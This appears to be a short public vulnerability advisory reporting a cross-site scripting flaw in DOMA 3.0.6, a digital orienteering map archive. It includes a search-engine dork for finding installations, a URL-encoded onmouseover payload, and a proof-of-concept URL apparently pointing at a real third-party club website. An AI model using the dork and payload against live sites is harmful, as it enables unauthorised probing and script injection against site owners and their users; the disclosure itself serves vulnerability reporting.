Doma version 3.0.6 suffers from a cross site scripting vulnerability.
d43eb6226b2bbcf824018858584f862893aff9a7e877168ec9390557ab456efb
============================================================================
| # Title : doma 3.0.6 xss Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 3.0.6 |
| # Vendor : https://www.matstroeng.se/doma/ |
| # Dork : Digital Orienteering Map Archive, version 1.0 | Log in |
============================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] use payload : %22onmouseover%3d'prompt(1373)'bad%3d%22
https://www.orivedenponnistus.fi//suunnistus/doma/users.php/%22onmouseover%3d'prompt(903296)'bad%3d%22
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================